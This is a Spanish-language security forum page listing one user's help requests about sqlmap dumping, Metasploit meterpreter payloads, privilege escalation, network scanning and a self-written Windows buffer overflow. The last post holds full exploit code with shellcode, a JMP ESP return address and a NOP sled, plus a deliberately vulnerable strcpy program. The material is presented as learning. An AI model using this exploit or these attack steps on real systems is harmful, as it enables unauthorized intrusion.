elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Nivel Web / Duda con Sql Injection en Sql Map en: 23 Enero 2012, 08:04 am
Hola a todos tengo una duda...
Cando trato de dumpear una tabla de usuarios en una base de datos en un laboratorio personal.
Resulta que el sqlmap me arroja la siguiente informacion...

[03:50:27] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
[03:50:29] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)


Alguno sabe por que pasa esto...
NOTA:Estoy usando tor y esta correctamente configurado.
Otras tablas pueden dumpearse pero estas de usuarios no...
2  Seguridad Informática / Hacking / Elevacion de Privilegios en: 14 Diciembre 2011, 19:32 pm
Hola a todos...
Estoy probando la explotacion de una maquina virtual para seguir aprendiendo y divertirme un poco...
La VM es Metasploitable y logre conseguir acceso a una shell con permisos de la cuenta de apache o sea la www-data.
Utilize el exploit...
Name: TikiWiki tiki-graph_formula Remote PHP Code Execution
Module: exploit/unix/webapp/tikiwiki_graph_formula_exec

y el payload meterpreter pero en php...
el tema es que no puedo subir archivos

  • uploading  : /root/Desktop/C99.php -> /root/Desktop/C99.php
  • [-] core_channel_open: Operation failed: 1

    Y eso no me deja explotar escalada de privilegios locales...
    Tampoco puede intentar obtener las passwords ya que obtengo el /etc/passwords pero el shadow no puedo leerlo por los permisos obviamente...
    Se les ocurre algo para hacer??

3  Seguridad Informática / Bugs y Exploits / Problema Con Exploit En Metasploit en: 25 Octubre 2011, 20:40 pm
Hola a todos ....

Estaba probando una vulnerabilidad reciente mas exactamente la presentada en
http://www.exploit-db.com/exploits/18031/
El problema, es la explotacion por internet probando mi servidor web que justamente tiene phpLDAPadmin y resulta que no puedo crear la session utilizando el payload payload/php/meterpreter/reverse_tcp creo que el problema esta en la ip que le estoy dando al payload en lhost que no se exactamente cual es la que debo utilizar, si es la ip publica cara a internet o la ip privada de mi lan.
Revise si la version de phpLDAPadmin es vulnerable utilizando el comando de metasploit check y comprobando manualmente la version, dando como resultado que es vulnerable asi que eso no puede ser.
Muchas gracias por su ayuda...
4  Seguridad Informática / Hacking / Problema Con Scaneo En Red Lan en: 13 Marzo 2011, 07:17 am
Hola a todos. Mi pregunta es algo que se vio bastante aca pero no logro poder solucionar. El tema es que tengo un amigo que me dio la ip de su router la cual es dinamica, ahi no hay problema me mantengo actualizado para no errarle al host, pero cuando trato de hacer un escaneo de vulnerabilidades usando el Nessus o escanear los puertos con el Nmap no obtengo ningun resultado.
Active el Dmz Host para abrir todos los puertos pero sige igual... El firewall del router no lo esta bloqueando nada, el router esta funcionando por que al ping responde....
Alguna idea ??
Muchas gracias
5  Programación / Programación C/C++ / Problema con tipo de dato de una variable en: 11 Febrero 2011, 21:40 pm
Hola a todos.
Estoy creando un programa y necesitaba que alguien me ayude con un problema que me encontre.

Código:
loadedDLL=LoadLibraryA(dll);
curpos=(BYTE*)loadedDLL;

Lo que necesito es guardar el valor de la variable curpos en un fichero,crear el fichero ya lo se pero el problema es que lo que contiene ese fichero son caracteres raros y no la direccion de memoria que deberia contener. EJ:7C86467B

Revisando el codigo encontre esto...

Código:
printf( "0x%X\tjmp %s\n", curpos, reg );

Como veran la variable curpos es mostrada en pantalla, pero en formato hexadecimal, digo esto por la cadena de formato %X.
El asunto seria como puedo convertir la variable curpos a hexadecimal, al menos eso creo yo, alguna idea?
ACLARACION: EL CODIGO ES DEL FINDJMP, POR LAS DUDAS...
Gracias...
6  Programación / Programación C/C++ / Problema con Memset en: 15 Enero 2011, 07:57 am
Hola a todos estoy creando un exploit para aprender el uso de los buffer overflow y me encontre con un problema sobre la programacion del mismo.
Resulta que tengo una variable llenarla de el caracter \x91, mas exacto poner 76 veces ese caracter.
Lo que hago es lo siguiente...

INICIO DE CODIGO
Código:
char nops[76];
memset(nops,'\x90',76);

El problema es que agrega al final de la variable tres caracteres mas que necesito que no esten, estos son los caracteres ↑♥>

Alguna idea sobre la solucion?

Gracias...
7  Seguridad Informática / Bugs y Exploits / Problema Con Buffer Overflow en: 8 Enero 2011, 20:22 pm
Hola a todos.
Es la primera vez que pregunto algo en este foro, espero que puedan ayudarme por que no encontre la respuesta de este problema en ninguna manual que he leido.
El tema es el siguiente estoy aprendiendo los Buffer Overflows, utilizando un programa sacado de una manual sobre el mismo tema.
El programa a los 316 caracteres empieza a sobreescribir el registro EIP, el asunto es que el EIP hace su salto a el offset 7C86467B (JMP ESP - Libreria KERNEL32) pero la shellcode no se ejecuta correctamente debido a que no se abre la shell o el programa que elegi.
El OllyDbg me dice Violacion de acceso al leer 00000032.
Yo vi que la pila no contiene toda la shellcode completa sino una pequeña parte...
Alguna idea sobre el problema?

CODIGO DEL EXPLOIT

Código:
#include <cstdlib>
#include <iostream>
#include <fstream>

using namespace std;

int main(int argc, char *argv[])
{

char shell[] = "\x2b\xc9\xbb\xef\x7a\x3b\xa1\xdb\xc8\xb1\x32\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x13\x03\x5a\x13\x83\xc2\x04\xe2\x1a\x86\xd3\x28"
"\xe4\x77\x24\x4b\x6d\x92\x15\x59\x09\xd6\x04\x6d\x5a\xba\xa4"
"\x06\x0e\x2f\x3e\x6a\x86\x40\xf7\xc1\xf0\x6f\x08\xe4\x3c\x23"
"\xca\x66\xc0\x3e\x1f\x49\xf9\xf0\x52\x88\x3e\xec\x9d\xd8\x97"
"\x7a\x0f\xcd\x9c\x3f\x8c\xec\x72\x34\xac\x96\xf7\x8b\x59\x2d"
"\xf6\xdb\xf2\x3a\xb0\xc3\x79\x64\x60\xf5\xae\x76\x5c\xbc\xdb"
"\x4d\x17\x3f\x0a\x9c\xd8\x71\x72\x73\xe7\xbd\x7f\x8d\x20\x79"
"\x60\xf8\x5a\x79\x1d\xfb\x99\x03\xf9\x8e\x3f\xa3\x8a\x29\x9b"
"\x55\x5e\xaf\x68\x59\x2b\xbb\x36\x7e\xaa\x68\x4d\x7a\x27\x8f"
"\x81\x0a\x73\xb4\x05\x56\x27\xd5\x1c\x32\x86\xea\x7e\x9a\x77"
"\x4f\xf5\x09\x63\xe9\x54\x44\x72\x7b\xe3\x21\x74\x83\xeb\x01"
"\x1d\xb2\x60\xce\x5a\x4b\xa3\xaa\x85\xa9\x61\xc7\x2d\x74\xe0"
"\x6a\x30\x87\xdf\xa9\x4d\x04\xd5\x51\xaa\x14\x9c\x54\xf6\x92"
"\x4d\x25\x67\x77\x71\x9a\x88\x52\x03\x79\x10\x38\x87\xe8\xaa"
"\xc2";

char ret[]= "\x7B\x46\x86\x7C"; /*KERNEL 32.DLL JMP ESP */
   
/*316NOPS */
char nops[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90";


cout << "CREANDO EXPLOIT" << endl;                     
ofstream archivo;
archivo.open("a.txt");
archivo<<nops<<ret<<shell;
archivo.close();
cout << "LISTO !!!" << endl;
cout<<endl<<shell;
system("PAUSE");
}



CODIGO DEL SOFT VULNERABLE

Código:
#include <cstdlib>
#include <iostream>
using namespace std;

int LeerFichero(char *Fbuffer, char *Fnombre, int Limite)
{
int c;
int n=0;
FILE *f;
f=fopen(Fnombre,"r");
while ((c=getc(f))!=EOF)
{
if(n<Limite)
{Fbuffer[n++]=c;}
}
Fbuffer[n++]=0;
fclose(f);
return 0;
}

int FuncionVulnerable(char *cptr)
{
char buff[300] = "Datos";
strcpy(buff,cptr);
printf("%s\n\n",buff);
return 0;
}

int FuncionOculta()
{
printf("Este texto nunca deberia de haberse mostrado");
return 0;
}

int main()
{
char buffer[1000];
char nombre[] = "a.txt";
LeerFichero(buffer,nombre,1000);
FuncionVulnerable(buffer);
return 0;
}

Gracias....
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines